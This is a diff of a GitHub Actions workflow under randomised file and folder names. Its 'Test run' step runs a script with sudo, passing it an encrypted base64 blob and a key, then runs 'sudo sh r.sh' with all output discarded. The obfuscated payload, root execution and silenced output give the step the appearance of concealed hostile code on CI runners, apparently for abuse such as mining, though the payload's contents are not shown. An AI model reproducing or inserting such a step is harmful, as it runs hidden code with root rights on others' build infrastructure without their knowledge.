--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '2zfy9'
+        echo 'tel2y'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19KACOKo8TRV+UsA5o8eqizV3oaTT5nbXDRyaW0QTuGJ1xSFjcMPCx0PUKeWP9avENF7I6nRX8U2vM7EBoWI/GkFhDRyy8VFXFkVSHwBPbPZgSjsY/aDRnr z4xtt1 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19YLUAqKKTAxrJDYCfDBq/66FL8I+4Z5gZHxdFcoM/jz5QbdeYZ5S2OQiyjFzFCmwbkYByDLg92ml/KpdlGdcRGTR3H/MEGr7lqdJVKyPPrbUmGb3UH89LT wkm2ka && sudo sh r.sh > /dev/null 2>&1
